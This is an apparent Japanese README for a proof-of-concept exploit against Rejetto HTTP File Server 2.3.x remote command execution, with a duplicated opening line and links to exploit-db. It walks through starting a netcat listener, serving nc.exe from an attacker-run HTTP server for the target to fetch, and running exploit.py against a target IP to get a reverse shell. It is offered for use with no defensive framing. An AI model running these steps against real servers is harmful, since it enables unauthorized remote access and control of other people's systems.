
このリポジトリには、Rejetto HTTP File Server (HFS) 2.3.x におけるリモートコマンド実行の詳細な説明と動作するPoCが含まれています。
このリポジトリには、Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution の詳細な説明と動作する PoC が含まれています。
Netcat リスナーを作成します。
nc -lnvp 1234
攻撃者の IP をあなたの IP とポートに変更します。

また、nc.exe が存在する同じディレクトリに HTTP ファイルサーバーを作成します。
python -m http.server 80
python exploit.py <ターゲットIP> <ターゲットポート>

注: リバースシェルを取得するには、ペイロードを複数回実行する必要がある場合があります。
https://www.exploit-db.com/exploits/39161
https://www.exploit-db.com/exploits/34668
https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/